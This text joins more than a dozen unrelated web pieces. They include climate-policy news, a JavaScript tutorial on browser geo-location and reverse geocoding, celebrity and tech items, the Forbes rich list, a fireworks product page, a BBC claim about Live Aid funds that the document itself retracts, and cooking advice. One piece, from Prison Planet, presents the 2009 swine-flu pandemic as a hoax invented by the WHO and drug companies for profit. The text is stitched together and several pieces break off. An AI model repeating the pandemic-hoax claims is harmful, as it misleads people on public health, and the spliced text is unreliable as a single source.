Top advisor says it is " imperative " for the US to tackle climate change and address reliance on foreign oil .
From BusinessGreen , part of the Guardian Environment Network
In a clear signal that the White House is preparing to turn its attention from healthcare reform to climate change legislation , one of president Obama 's top advisors launched an impassioned call for the US to embrace low - carbon policies last week .
Speaking at a Washington energy conference , Larry Summers , head of the White House 's National Economic Council , warned the long - term economic health of the US would be jeopardised if it failed to pass ambitious climate change legislation .
Describing it as " imperative " for the US to tackle climate change and " address the consequences of excessive dependence on oil for our national security " , Summers underlined the importance of the administration 's plan to pass climate change legislation .
" If you think about the risks to our ecology , the risks to our security , we minimise those risks with comprehensive energy policy , " he said .
" And if you think about the opportunity to lead in what is really important , we maximise that opportunity with comprehensive energy legislation .
That 's why energy is so crucial a part of president Obama 's economic strategy . "
Capitol Hill insiders said Summers ' speech suggested president Obama was gearing up to try to pass the draft climate change bill being prepared by Democrat senator John Kerry , Republican senator Lindsey Graham and independent senator Joe Lieberman ahead of November 's mid-term elections .
The Democrat leadership has consistently said it would try to pass the bill this year , but a number of Democrat senators had warned that they would prefer to see a vote delayed until next year after the battle to pass healthcare legislation proved so divisive .
Dan Weiss , a senior fellow at the Center for American Progress think - tank , told the New York Times that the president was likely to intervene directly to help secure the 60 votes necessary to pass the legislation .
The president met recently with a group of senators who are expected to hold crucial swing votes and Weiss predicted further meetings could be on the cards as the administration rushes to pass the bill ahead of mid-term elections during which the Democrat 's Congressional majority is expected to come under fire .
" There 's something about the president or vice president of the United States talking to you about these things that helps get to ' yes , ' " he said .
Meanwhile , green businesses are also preparing for what promises to be a brutal fight with Republican senators and climate - sceptic lobby groups over climate change legislation with the launch of a new advertising campaign in support of the proposed climate bill .
The campaign is backed by more than 3,000 businesses , including the American Businesses for Clean Energy and the US Climate Action Partnership , and has secured support from a number of America 's leading brands , including Google , Nike and Timberland .
The print ad , titled " A Question of American Leadership " , urges Congress to enact bipartisan climate and energy legislation that " increases our security and limits emissions , as it preserves and creates jobs " .
About The Author Chris is a Developer Evangelist living in London , England , who writes about JavaScript development , accessibility , and all things open web .
After several years …
More about Christian Heilmann …
Entering The Wonderful World of Geo Location
Smashing Newsletter
Every week , we send out useful front - end & UX techniques .
Subscribe and get the Smart Interface Design Checklists PDF delivered to your inbox .
Your ( smashing ) email Subscribe →
I thought I could not be out - geeked .
With a background in radio , and having dabbled in the demo scene on the Commodore 64 and hung out on BBS and IRC for a long time and all the other things normal kids do n’t quite get , I thought I was safe in this area .
Then I went to my first WhereCamp , an unconference dealing with geographical issues and how they relate to the world of Web development .
Even my A - Levels in Astronomy did not help me there .
I was out - geeked by the people who drive and tweak the things that we now consider normal about geo-location on the Web .
Pulling out your phone , find your location and getting directions to the nearest bar is easy , but a lot of work has gone into making that possible .
The good news is that because of that effort , mere geo-mortals like you and me can now create geographically aware products using a few lines of code .
So , let ’s give the geo -community a big hand .
Be sure to check out the following articles :
Why Geo Matters
First of all , why is it important to consider physical location on this planet ( at this moment ) when we develop Web products ?
There are a few answers to this .
The first answer is mobility .
The days of people sitting in front of desktop machines at home are over .
Sales of mobile devices , laptops and netbooks have overtaken those of bulky stationary computers in the last few years .
The power of processors now allows us to use smaller , more mobile hardware to perform the same tasks .
So , if people use their hardware on the go , we should bring our systems to them .
Which brings us to the second — very important — point : relevance .
Giving the user content that is relevant to the physical space they are in at the moment makes a lot of sense .
We are creatures of habit .
While we love the reach of the Internet , we also want to be able to find things in our local area easily : people to meet , cafes to frequent , interesting buildings and museums to learn about .
The advertising industry — especially of the adult and dating variety — realized this years ago .
I am sure you have come across one of the following before :
I am sure these ads are more successful than the ones that show only user names .
That the photos and names are the same for every location does n’t seem to be a problem ( but yes , I noticed it ) .
So how does it all work ?
Getting The User ’s Location Via IP
Every computer on a network has a number that identifies it : its IP address .
The Internet is nothing but a massive network , and your IP number is assigned to you by the service provider that you have used to connect to that network .
Because the numbers that service providers assign change from one geographical location to the next ( much like telephone numbers ) , you can make quite a good estimate of where your visitors are from .
To find out where a certain phone number is from , you use a phone book .
To find out where an IP is from , you can use the Maxmind GeoIP database .
Maxmind also provides a JavaScript solution that you can use on websites :
< script type =" text / javascript " src= "
http://j.maxmind.com/app/geoip.js "></script> < script > var info = document.getElementById(' info ' ) ; var lat = geoip_latitude ( ) ; var lon = geoip_longitude ( ) ; var city = geoip_city ( ) ; var out = ' < h3 > Information from your IP < / h3 > '+ '< ul > '+ '< li>Latitude : ' + lat + '</li>'+ '< li>Longitude : ' + lon + '</li>'+ '< li> City : ' + city + '</li>'+ '< li>Region : ' + geoip_region ( ) + '</li>'+ '< li>Region Name : ' + geoip_region_name ( ) + '</li>'+ '< li>Postal Code : ' + geoip_postal_code ( ) + '</li>'+ '< li>Country Code : ' + geoip_country_code ( ) + '</li>'+ '< li>Country Name : ' + geoip_country_name ( ) + '</li>'+ '</ul >' info.innerHTML
= out ; </ script >
This gives you some information on the user ( try it out for yourself ) .
The challenge , though , is relevance .
Your IP location is the location of the IP that your provider has assigned to you .
Depending on your provider , this could be quite a ways off ( in my case , I live in London , but my provider used to show me as living in Rochester ) .
Another problem is if you work for a company that uses a VPN .
At Yahoo , for example , I have to connect to the VPN to read my company email , and I have to choose a location to connect to :
So , for a solution like the one highlighted above , I would show up as being in a totally different part of the world ( which might be useful for watching Internet TV in the UK while I am in the US ) .
IP geo-location , then , is an approximation , not a dead - on science .
Getting The User ’s Location Via The W3C Geo API
Guessing geographical location via IP is possible , but it can also be pretty creepy .
Being able to take advantage of your location is useful , but security - conscious users and people who are generally suspicious of the Internet are not happy with the idea of their movements being monitored by a computer .
This makes sense : if I can monitor your whereabouts day and night , I would know where and when to rob your house without you being there .
There are a lot of solutions to the challenge of having good - quality geo-location and maintaining privacy .
Google Gears has a geo-location service ; Plazes helps you store your location ; and Yahoo ’s Fire Eagle is probably the most polished way to securely maintain your location on the Web .
The problem with all of these services is that they require the user to either install a plug - in or visit a Web service to update their location .
This is not fun ; browsers should do the work for you .
We now have a W3C recommendation for a geo-location API that allows browsers to request the geographical location of the user .
This makes it less creepy , and you get real data back .
Firefox 3.5 and above supports the W3C geo-location API .
So does Safari on the iPhone if you run OS 3.0 or above .
If you use the API , the browser will ask the user whether they want to share their location with your website .
Once the user allows you to get their location , you get much more detailed latitude and longitude values .
Using the API is very easy :
// if the browser supports the w3c geo api if ( navigator.geolocation ) { // get the current position navigator.geolocation.getCurrentPosition ( // if this was successful , get the latitude and longitude function ( position ) { var lat = position.coords.latitude ; var lon = position.coords.longitude ; } , // if there was an error function ( error ) { alert ( ' ouch ' ) ; } ) ; }
Compare the IP and W3C solutions side by side .
As you can see , there can be quite a difference in measuring the visitor ’s location .
The extent of the difference is shown in the following demo :
Converting Latitude And Longitude Back Into A Name
Having more information is nice , but we have lost the name of the city and all the other nice data that came with the Maxmind database .
Because the location has changed , we cannot just grab that old data ; we have to find a way to convert latitude and longitude coordinates into a name .
This process is called “ reverse geo-coding , ” and several services on the Web allow you to do it .
Probably the most well - known is the geo-names Web service , but it has a few issues .
For starters , the results are very US - centric .
One freely available but lesser - known reverse geo-coder that works worldwide comes from a surprising source : Flickr .
The flickr.places.findByLatLon service returns a location from a latitude and longitude coordinates .
You can try it out in the app explorer , but by far the easiest way to use it is by using the Yahoo Query Language ( or YQL ) .
YQL deserves its own article , but let ’s just say that , instead of having to authenticate with the Flickr API and read the docs , reverse geo-coding becomes as easy as this :
select * from flickr.places where lat=37.416115 and lon= -122.0245671
Using the YQL Web service , you can get the result back as XML or JSON .
So , to use the service in JavaScript , all you need is the following :
< script type =" text / javascript " charset= " utf - 8 " > function getPlaceFromFlickr( lat , lon , callback ) { // the YQL statement var yql = ' select * from flickr.
places where lat= '+ lat + ' and lon= '+lon ; // assembling the YQL webservice API var url = ' http://query.yahooapis.com/v1/public/yql?q='+
encodeURIComponent( yql ) +'&format=json&diagnostics= '+ ' false&callback='+callback ; // create a new script node and add it to the document var s = document.createElement ( ' script ' ) ; s.setAttribute(' src',url ) ; document.getElementsByTagName( ' head ' ) [ 0].appendChild(s ) ; } ; // callback in case there is a place found function output ( o ) { if ( typeof(o.query.results.places.place ) != ' undefined ' ) { alert(o.query.results.places.place.name ) ; } } // call the function with my current lat / lon getPlaceFromFlickr( 37.416115,-122.02456 , 'output ' ) ; </ script >
Combine that with the other services , and we get a more detailed result and can put a name to the coordinates :
The Trouble With Latitude And Longitude
While latitude and longitude coordinates are a good way to describe a location on Earth , it is also ambiguous .
The coordinates could represent either the centre of a city or a point of interest ( such as a museum or a pub ) in that spot .
WOEID to the Rescue
To work around the problem , Yahoo and Flickr ( and soon will Twitter ) support another way to pinpoint a location .
The Where On Earth Identifier ( or WOEID ) is a more granular way to describe locations on Earth .
Because Flickr supports it , we can easily get get photos from a particular area :
select * from flickr.photos .search where woe_id in ( select place .
woeid from flickr.places where lat=37.416115 and lon= -122.02456 )
Using this and a few lines of JavaScript , showing geo-located photos is pretty easy :
This has also been wrapped in a simple - to - use YQL solution .
The following code will display 10 photos of Paris :
< script > function photos ( o ) { var container = document.getElementById(' photos ' ) ; container.innerHTML
= o.results ; } </script > < script src= "
http://query.yahooapis.com/v1/public/yql?q=
select%20*%20 from%20 flickr.photolist%20where%20location%3D%22 paris%2Cfr
%22%20and%20text%3D%22%22%20and%20amount%3D10&format=xml& env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys&callback=photos " >
You can also play with this in the YQL console .
Why Not Search For The Location ’s Name ?
The main question about implementations such as the one above is why could n’t we just do a search on Flickr for the city , instead of doing all the complex geo-lookups ?
The reason is false positives .
Take Paris , for example : if you want to show photos of Paris on a travel website , you do n’t want Paris Hilton to show up in there .
Same goes for Jack London .
You may also want to show photos of London , England , not London , Ontario .
Geographic data is full of these kinds of gotchas , and the term for finding the right one is “ disambiguation . ”
See the Wikipedia article on “ Victoria ” to see just how many geographical contexts this term can have .
Turning Text Into Geo-Data
Finding a visitor ’s geographic location is all well and good , but it does n’t mean much if you ca n’t link it to information for that area .
This is where it gets tricky .
For Flickr ( and soon Twitter ) , this is easy , because both services are able to attach geographical locations to the content you put in them .
This is not so for most of the information on the Web , though , and this is when we resort to clever algorithms , machine - learning , pattern - matching and all the other think - tank stuff that computers and the scientists in front of them do .
Say you want to identify the geographical locations that a particular text or Web page talks about .
Yahoo offers a service for that called Placemaker , and it is pretty easy to use .
You need to get a developer key and send this as appid , send a text as documentContent , define the type of the text as documentType and define the type of data you want back as outputType .
All of this needs to be sent as a POST to http://wherein.yahooapis.com/v1/document :
< form action = " http://wherein.yahooapis.com/v1/document " method= " post " > < textarea id =" text " name =" documentContent " >
Hi there , I am Chris .
I live in London , I am currently in Sunnyvale and will soon be in Atlanta and Las Vegas . </ textarea > < div > < input type =" submit " name = " sub " value= " get locations " ></ div > < input type =" hidden " name = " appid " value= " { YOUR_APP_ID} " > < input type =" hidden " name =" documentType " value = " text / plain " > < input type =" hidden " name = " outputType " value= " xml " > </ form >
You can try this out yourself .
Using PHP to call the API instead of a simple form , you can even format the output nicely .
See it in action here :
While developers who have played around with Web services wo n’t find Placemaker hard to use , the service can be daunting for the average developer .
That is why I built GeoMaker some time ago .
GeoMaker allows you to enter a text or URL , select the locations you want to include in the final outcome , and get the locations either as a map to copy and paste or as micro -formats .
However , because there is also a YQL solution for using PlaceMaker in JavaScript , we can do the same with a few lines of client - side code to enhance an HTML document .
Check out the following example :
To use this , you need three things : a text with geographical locations in them in an element with an ID , a Google Maps API key ( which you can get here ) and the following few lines of code :
< script src= " http://github.com/codepo8/geotoys/raw/master/addmap.js "></script> < script > addmap.config.mapkey = ' COPY YOUR API KEY HERE ' ; addmap.analyse( ' content ' ) ; </ script >
This makes it incredibly easy to give your visitors a sense of what part of the world a text is related to .
Adding Maps To Your Documents
Online maps have been around for a while now ( and Google Maps was instrumental in the rise of AJAX ) , and many providers out there allow you to add maps to your documents .
Google is probably the leader , but Yahoo also has maps , as does Microsoft and many more .
There is even a fully open map service called Open Street Maps , which has been instrumental in the recent rescue efforts in Haiti .
If you want interactive maps , probably the easiest thing to use is Mapstraction , which is a JavaScript library that does away with the discrepancies between the various map providers and gives you a single interface for all of them .
24 ways published a good introduction to it three years ago .
Probably the simplest way to show a map that supports markers and paths in your document without having to dive into JavaScript is the Google static maps API .
It creates maps as images , and all you need to do is provide the map information in the src URI of the image .
For example , in the script example above , this would be :
http://maps.google.com/maps/api/staticmap?
sensor=false &size=200x200 &maptype=roadmap &key=YOUR_MAP_KEY &markers=color:blue|label:1|37.4447,-122.161 &markers=color:blue|label:2|37.3385,-121.886 &markers=color:blue|label:3|37.3716,-122.038 &markers=color:blue|label:4|37.7792,-122.42
You can define the size and type of the map .
If all you provide is the location of markers , the API will automatically find the right zoom level and area to ensure that all markers are visible .
Google ’s website even offers a detailed tool to create static maps , including markers and paths .
Geo Is A Space To Watch
I hope this has given you some insight into all of the things you can do to bring the earth to your product and to put your product on the map .
Geo-location and geo- aware services are already huge , and they ’ll be even more important this year .
There will be more services — some mobile providers are ready to roll out new hardware and software — and now you can be a part of it .
What the geo - world needs now is a designer ’s eye , and this is where you can help the geo - geeks create apps that matter , that look great and that make a difference in our visitors ’ lives .
For inspiration , check out Mapumental , which allows you to pinpoint a place to live in London , or see how Google Earth and some 3 - D Objects allow you to race a milk truck on real map data .
Surviving the World A Photocomic Education by Dante Shepherd
Lesson # 598 - Everyone 's Opinion Of Someone On The Internet ( Bracket Week II )
Everyone thinks of someone in this way .
That just seems to be how it works .
And so ends Bracket Week 2010 .
Hope you enjoyed it .
Wait until next year for Bracket Week III : The Revenge .
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
The new crossword puzzle homework may hit close to home for some people .
Try it and the daily puzzle .
In an unlikely love match of Soviet nostalgia and social networking , the almost - forgotten radio star Eduard Khil – known as Mr. Trololo man – has suddenly become a YouTube pop icon with his own Facebook fanpage .
A 40 - year - old clip from Soviet TV , starring a chubby and ruddy - faced Mr. Khil , decked out in a tacky Soviet polyester suit , has gone viral in recent weeks , garnering more than 2 million hits and sparked an Internet petition urging him to undertake a global tour to reignite his career .
( Watch the video below . )
Reached at his St. Petersburg home , the elderly Khil would not give any response to the petition , offering a bit of philosophy instead .
" What is fame ? " said Khil , a big star in his day .
" [ Russian poet Alexander ]
Pushkin said it 's just a bright patch upon a shabby singer 's rags .
When it happens , it happens . "
' Trololo man '
And now , fame has definitely happened – again .
Unearthed by the Internet , one of Khil 's ancient gigs has earned him sudden recognition , seemingly the world over , as the " Trololo Man " ( also spelled Trolololo ) after the repetitious , warbling tone in which he delivers the song .
Khil , a fine baritone , is shown crooning a wordless but catchy little tune titled , " I 'm so happy to be finally back home , " while strolling and gesturing dramatically amid a bizarre backdrop of ornate metallic constructions .
On the phone , he explained that the reason the iconic song has no lyrics is that the original ones , about a cowboy riding the range while his wife sits at home knitting socks , were banned as " too naughty " by Soviet censors of the day .
" A theme like that was unacceptable , so we decided to sing it without any words at all , " he said .
" So , in this case , I was an instrument rather than a singer . "
Stephen Colbert is a fan
It 's not clear whether it's the weird Sovietesque kitsch of the piece , the irritatingly addictive melody , or Khil 's over - the - top performance that has attracted so much belated attention .
But it has received backhanded accolades from no less than Stephen Colbert – who highlighted it as a tonic for disappointment – and Christoph Waltz , the Oscar - winning star of " Inglourious Basterds , " who offered his own bawdy rendition on ABC's Jimmy Kimmel Live !
" This is a new media sensation , and an interesting example of how the instant - messaging culture works , " says Alexei Goreslavsky , director of Internet projects for the independent Russian Interfax news agency .
" People browse the Internet , find things that are funny , or cute , or odd , and immediately want to share them with friends .
That 's how something like this comes from nowhere , and suddenly it seems to be everywhere .
Khil 's son Dmitry , also a musician , says his dad does n't really know what the Internet is and suspects all this newfound attention is some kind of joke .
" He thinks maybe someone is trying to make a fool of him , " says Dmitry .
" He keeps asking , ' Where were all these journalists 40 years ago ? ' "
Turning fans into cash
Older Russians remember Khil fondly , and many of his songs ( like this and this ) were big hits on Soviet radio and TV .
" Khil was a brilliant professional , " says Anatoly Portnov , a well - known Russian composer .
" There are no singers like him nowadays .
Soviet songs had a lot of good things in them ; it was n't just about glory to the Communist Party .
These days , you hear good works like that so seldom .... "
But can Khil turn his Internet buzz into fresh success ?
Some fans had suggested that he be entered in the upcoming Eurovision contest , which Russia hosted last year .
Ironically , the honor of representing Russia in Eurovision this year was won by Pyotr Nalich , an edgy singer who shunned the traditional routes to success and rose to popularity almost exclusively through YouTube exposure .
" If you ask a young person today who Khil is , they will answer that he's the Trolololo man , " says Mr. Goreslavsky .
" That 's a kind of name recognition created by this new culture , and it can lead to new interest in him and his work .
Khil can convert that into new success , and real money , if he wants to . "
The flood of terse emails from Apple CEO Steve Jobs continues ( via TUAW ) , this time responding from his iPad with a simple " Yep " to a question from a user about whether the iPhone 's Mail functionality will gain a " universal mailbox " as found in Mail on Mac OS X .
Anyway , I just have one question for you : will iPhone ever have a universal mailbox just like Mail has on my Mac ?
It would be so much easier and efficient .
i Phone users with multiple email accounts on their devices currently must manually navigate between accounts to check for messages in each one , whereas Mail on Mac OS X presents a single Inbox with messages from all accounts displayed in a single window .
Jobs ' reply suggest that such Mac OS X - like Mail functionality is planned for the iPhone , although it is unknown when the change might be implemented .
Apple is widely expected to introduce new iPhone models , and presumably an updated " iPhone OS 4.0 " , sometime in the June or July timeframe if past releases can be trusted as an indication .
Also mentioned in TUAW 's report are brief emails from Jobs arguing for iPhoto over Google 's Picasa for photo management and noting that users will be able to move documents onto the iPad .
Council of Europe chair says pharmaceutical companies conspired with WHO to make vast profits from fake hysteria
Paul Joseph Watson
Prison Planet.com
Thursday , February 4 , 2010
Appearing on The Alex Jones Show , outgoing Chair of the Council of Europe ’s Sub-committee on Health Wolfgang Wodarg said that his panel ’s investigation into the 2009 swine flu outbreak has found that the pandemic was a fake hoax manufactured by pharmaceutical companies in league with the WHO to make vast profits while endangering public health .
The Parliamentary Assembly of the Council of Europe , a 47 nation body encompassing democratically elected members of parliament , began hearings last month to investigate whether the H1N1 swine flu pandemic was falsified or exaggerated in an attempt to profit from vaccine sales .
Wodarg said that governments were “ threatened ” by special interest groups within the pharmaceutical industry as well as the WHO to buy the vaccines and inject their populations without any reasonable scientific reason for doing so , and yet in countries like Germany and France only around 6 per cent took the vaccine despite enough being available to cover 90 per cent of the population .
Wodarg said he was alarmed when the WHO cited early cases in Mexico as a threat and quickly moved to pandemic status , despite the fact that the cases were relatively mild and the virus was not new .
“ This was the mildest flu ever and the people were much more clever than the government so we have to find out what was going on with WHO – why did they do this pandemic alarm , ” asked Wodarg , noting that pharmaceutical interests within the World Health Organization were instrumental in creating the panic and reaping the financial dividends .
A d v e r t i s e m e n t
“ We do n’t know what really happened , we only know that they changed the definition of a pandemic , which was a very dangerous thing before and now is just a normal flu , and this is why business for pharmaceutical companies was open , ” said Wodarg , adding that select pharmaceutical companies were handed a monopoly on creating the vaccine .
“ It is their trick that they always try to monopolize this and we pay much more like this , ” said Wodarg , noting that if patents were left open , vaccines would be produced much quicker and far cheaper .
( ARTICLE CONTINUES BELOW )
Wodarg said there was “ no other explanation ” for what happened than the fact that the WHO worked in cahoots with the pharmaceutical industry to manufacture the panic in order to generate vast profits , agreeing with host Alex Jones that the entire farce was a hoax .
He also explained how health authorities were “ already waiting for something to happen ” before the pandemic started and then exploited the virus for their own purposes .
Wodarg said that the investigation was likely to recommend an end to the undue influence of pharmaceutical companies on public health institutions in Europe .
However , Wodarg pointed out , “ There is no law for WHO , there is no one who punishes those people in WHO , we only have national law , so this is very important that we collect the information and on the national level we try to find those people responsible and we try to punish them . ”
“ Have investigations , have a deep look , we cannot tolerate such a development , we cannot have this next winter again , we do n’t want such fake pandemics , ” concluded Wodarg .
Wodarg said that vast quantities of unused vaccines were now being dumped on the third world and that other countries were simply trying to push ahead with vaccination programs even though the virus has proven not to be a major threat .
“ The Japanese bought vaccines for 110 million people and they cannot return from this vaccine contract so they are in a very big political dilemma now and they already have problems because the Japanese people already know it would n’t be necessary to get vaccinated , ” Wodarg told The Alex Jones Show .
Watch the interview with Wodarg below .
This article was posted : Thursday , February 4 , 2010 at 1:38 pm
Print this page .
Infowars.com Videos :
Comment on this article
Our attorneys at Keogh Law , Ltd. , are dedicated to representing clients who are overwhelmed with complex consumer law disputes .
Whether you have been a victim of debt collection or robo / telemarketing call harassment , you need representation that can secure your financial future and protect your rights immediately .
Fortunately , our firm has extensive knowledge of the laws in place to provide consumer protection against unfair practices .
We have 13 years of experience defending the rights of individuals protected under the Telephone Consumer Protection Act ( TCPA ) .
We understand the stress created by robo calls and telemarketers , and will fight to end any illegal practices used against you .
As an individual , you have rights that are guaranteed by law .
As an employee , you are entitled to fair treatment in regards to payment and unbiased background checks .
Our firm is committed to ensure that you are being paid in full any overtime that is due , as well as make sure you are aware of any background checks made on your behalf for employment consideration .
We take the time to understand your needs urgently as well as examine all of the details surrounding your case to help us craft effective solutions .
New York ( CNN ) --
Forbes magazine released its annual list of the world 's richest people Wednesday , and for only the second time since 1995 , Microsoft founder Bill Gates ' name was not at the top .
This year , the title of " World 's Richest " went to Mexican telecom mogul Carlos Slim , with a net worth of $ 53.5 billion .
Slim , whose holding company America Movil contains a sprawling collection of telecom assets , is the first non-American to be declared Forbes ' richest person since 1994 , when Japanese real estate kingpin Yoshiaki Tsutsumi held that honor .
( He has since disappeared from the list entirely ) .
But Slim 's financial edge over Gates is , well , slim , at least by billionaire standards -- just $ 500 million .
A $ 1 increase in Microsoft shares , the compilers of the Forbes list noted at a press conference Wednesday , could send Gates ' net worth ahead of Slim's .
Also , were it not for his extensive philanthropy , Gates would have a net worth in the ballpark of $ 80 billion , Forbes ' Matthew Miller estimated .
How much should a billionaire donate to charity ?
Gates is the world 's second richest person , with a net worth of $ 53 billion .
Warren Buffett came in third this year , with a net worth of $ 47 billion .
Billionaires ' total net worth rose 50 percent to $ 3.6 trillion .
After sharply contracting the previous year , the total number of billionaires also increased from 793 to 1,011 , Forbes ' list showed .
The number is still lower than the record 1,125 billionaires recorded in 2008 .
Not only are there more billionaires than last year , but the ones at the top are even richer than last year .
The top 10 billionaires have a combined net worth of $ 342 billion , up from $ 254 billion in 2009 , Forbes said .
In terms of the international scorecard , the United States still boasts more billionaires than any other country -- 403 , or nearly 40 percent of all billionaires .
New York , similarly , has more billionaires than any city on the globe .
But America 's billionaires have not rebounded from the recession as strongly as other countries ' billionaires .
The United States " is not doing as well as the rest of the world in coming back , " publisher Steve Forbes said .
As U.S. billionaires ' dominance of Forbes ' list wanes , Asian countries are seeing their ranks of billionaires swell , especially China .
Mainland China has the second - most billionaires after the United States , overtaking Russia for the first time .
Taiwan , South Korea , Hong Kong and India also saw significant upticks in their billionaire tallies .
Elsewhere , Turkey 's billionaire community expanded notably , jumping to 28 members from 13 , while Western Europe , Saudi Arabia and the United Arab Emirates underperformed by comparison .
As in years past , the Forbes list showed a severe gender imbalance in the world 's billionaire population
Eighty - nine of the 1,011 billionaires are women .
Fourteen of those female billionaires are self - made , including Oprah Winfrey , whose net worth dipped $ 300 million to $ 2.4 billion .
Half of the world 's self - made female billionaires are from China .
For three years running , Facebook founder Mark Zuckerberg , 25 , secured the distinction of being the list 's youngest billionaire , climbing to the 212th rung with a net worth of $ 4 billion .
On the opposite end of the age spectrum is Switzerland 's 99 - year - old Walter Haefner , ranked 287th .
The year 's biggest winner was Brazilian minerals magnate Eike Batista , who added $ 19.5 billion to his net worth in 12 months , enough to catapult him to eighth place on the list , from 61st .
Modesty is apparently not one of Batista 's many possessions :
He has vowed to become the world 's richest person .
On the flip side , German heiress Madeleine Schickedanz 's bank account had a hideous year .
After clocking in as Forbes ' 142nd richest person in 2007 , she plunged into relative penury and now " claims to be living on several thousand dollars a month , " said Forbes senior editor Luisa Kroll .
The victorious South Australian premier has announced that former backbencher John Rau will replace Michael Atkinson as Attorney - General of the state .
Chris Pryor of the Games4Croydon party said last night via Twitter that the long - serving Rau is " a supporter of the R18 + classification for games ( and a nice guy to boot ) " .
Pryor blogged on Monday that " seeing the role of Attorney - General filled by someone other than Mr Atkinson was a primary founding goal of Gamers4Croydon " .
" With less than 6 months to prepare , no political experience , and only a few thousand dollars funding , we have achieved that goal .
" Unfortunately there are never any guarantees in politics , but we have removed the largest impediment to classification reform . "
Please turn on JavaScript .
Media requires JavaScript to play .
Former battery hens which have lost their feathers are being knitted jumpers by a Somerset craft club to keep them warm .
The knitwear will be donated to Little Hen Rescue in Norwich , a not - for - profit organisation which re-homes the hens .
Battery hens , which are not bred for meat , are normally sold for slaughter after one year , when they start producing fewer eggs .
The rescue centre buys them and then offers them as pets as an alternative .
Will Glennon reports .
No. of Shots ------25
Effect --------------
crackles , strobes , spinners , bees , mines , bangs
Colour ------------- blue , silver , red , purple
Duration ----------- 30 seconds
Calibre -------------18mm
Below : See the Iron Man compared in size to a can of Coca Cola .
I know which one I find more healthy !
This brilliant value small 25 shot barrage by Epic Fireworks is a fantastic intro to your display .
With red and silver spinning stars and blue lights .
Loud mines with bangs and crackling stars , flying bees and spinning silver comets all in less than 30 seconds .
This is an action - packed barrage and a bargain piece .
We recommend lighting these 2 at a time for a busy and beautiful start to your display .
Check out Epic Fireworks other fantastic 25 shot barrages .
Opinion
The world may not be doomed after all , according to top American dirt scientists .
Soil - dwelling microbes , expected in climate models to go into CO 2 - spewing " overdrive " as the world warms , refused to do so in experiments .
This is how you create a greenhouse effect .
According to a statement released this week by the US National Science Foundation , which funded the research :
Conventional scientific wisdom holds that even a few degrees of human - caused climate warming will shift fungi and bacteria that consume soil - based carbon into overdrive , and that their growth will accelerate the release of carbon dioxide into the atmosphere .
This conventional wisdom now appears to be wrong , as research conducted by University of California ecologist Steve Allison have shown that in fact the carbon - eating microbes ' planet - busting activities are reduced , not increased , by warmth .
Allison developed a new climate model based on experimental results showing what happened in soils which had been warmed up artificially in greenhouses over a period of several years .
There is an initial increase in microbial emissions , which has been the basis for existing models , but after a while the microbes " overheat " and their numbers - and CO 2 output - plunge .
" When we developed a model based on the actual biology of soil microbes , we found that soil carbon may not be lost to the atmosphere as the climate warms , " Allison says .
" Conventional ecosystem models that did n't include enzymes did not make the same predictions . "
The flow of carbon in and out of the Earth 's soils is thought to be one of the biggest factors in the amount of greenhouse effect experienced by the planet , so the new results could have a major effect on climate forecasts and related government policies .
Allison cautions that more research is needed , but seems confident that the microbe menace is not as severe as had been thought .
" We need to develop more models to include microbe diversity , " he says .
" But the general principle that 's important in our model is the decline of carbon dioxide production after an initial increase . "
Allison and his colleagues ' research appears online this week in Nature Geoscience . ®
An investigation by the BBC has found just 5 per cent of the money raised by Live Aid and Band Aid actually made it to the victims of famine in Ethiopia .
Instead , the millions of dollars of international aid intended to buy food for starving Ethiopians was used by rebel groups to buy weapons .
The 1985 Live Aid and Band Aid concerts , organised by Bob Geldof in the UK and the US , raised $ 250 million .
As images of emaciated children were beamed around the world , Geldof took to the stage at Wembley Stadium in London to plead with an audience of countless millions to dig deep for the poor people of Ethiopia .
But the BBC 's investigation has found most of the money raised was diverted to buy weapons and support the rebel movement .
Northern Ethiopia was the scene of the famine which claimed one million lives .
It was an area hit hard by drought and civil war .
Aid agencies had no choice but to work with the rebels to reach the starving in Tigray and Eritrea .
Former rebel army commander Aregawi Berhe was a member of the Tigrayan People 's Liberation Front .
Mr Berhe now lives in exile in the Netherlands .
He says $ 100 million raised by the international community was divided up by rebel army leader Meles Zenawi , who is Ethiopia 's current prime minister .
" We were using aid money to buy arms through secondary means , " he said .
" In 1985 , when Tigray was hit by the terrible famine , aid money was flowing .
" I remember Meles Zenawi suggesting that 50 per cent of that money should go to activities , 45 per cent should go to organising and 5 per cent to support the victims . "
The allegations are supported by a secret CIA assessment written at the time which states that aid money was " almost certainly " being diverted for military purposes .
One of the traders who sold grain to Christian Aid in the 1980s has also told the BBC he was in fact a senior rebel commander posing as a merchant .
The executive director of Bob Geldof 's charity One , Jamie Drummond , went back to Ethiopia last year to check on the impact of funds raised in 1984 .
" It was 25 years ago .
There was a Cold War going on and people were trying very hard to get the money and above all food aid through to the starving millions , mainly in Ethiopia , " he said .
" By and large that effort was really successful and many , many tens of thousands , hundreds of thousands , maybe millions , were kept alive by these programs . "
Mr Drummond says Geldof and his charity are confident the majority of money raised by Live Aid and Band Aid made it to those for whom it was intended .
" There was excellent auditing in the process .
You can never be confident that every single penny gets to the ultimate destination , but you can be by and largely confident the vast majority of it did , " he said .
Editor 's note ( November 17 , 2010 ) : Following a complaint from the Band Aid Trust the BBC has investigated these statements and concluded that there was no evidence for them , and they should not have been broadcast .
The BBC has apologised unreservedly to the Band Aid Trust for the misleading and unfair impression which was created .
The idea of quick , flavorful weeknight cooking is nothing new .
And neither is most of the advice .
In 1930 , when the great Edouard de Pomiane addressed the topic in his cookbook “ French Cooking in Ten Minutes : or , Adapting to the Rhythm of Modern Life , ” one of his first instructions was to start a pot of water boiling -- “ What ’s it for ?
I do n’t know , but it ’s bound to be good for something . ”
FOR THE RECORD :
Dry pasta ingredients :
An article in the Jan. 7
Food section about cooking dried pasta said that if you see riboflavin or thiamine among a brand ’s ingredients , it means the noodle was made in the United States .
It also named DeCecco as a brand of pasta made in the U.S.
In fact , those additional ingredients indicate they were made for the U.S. market , not that they necessarily were made here .
DeCecco makes pasta with those ingredients in Italy for the U.S. market . —
Well , I would n’t presume to one - up Pomiane , but I can definitely tell you what that pot of boiling water is for in my kitchen : cooking dried pasta , the greatest friend a weeknight cook has ever had .
If you have some good dried pasta on hand , even just a chunk of dried - out cheese can be turned into a feast .
( You ’ll want to use spaghetti or another long , thin noodle ; toss it with butter and then the grated cheese -- do it in this order to keep the cheese from clumping .
A good grinding of black pepper is all you need to finish the dish . )
One of my favorite recipes is only a little more complicated than that .
During the winter , it seems like I make pasta with broccoli almost once a week .
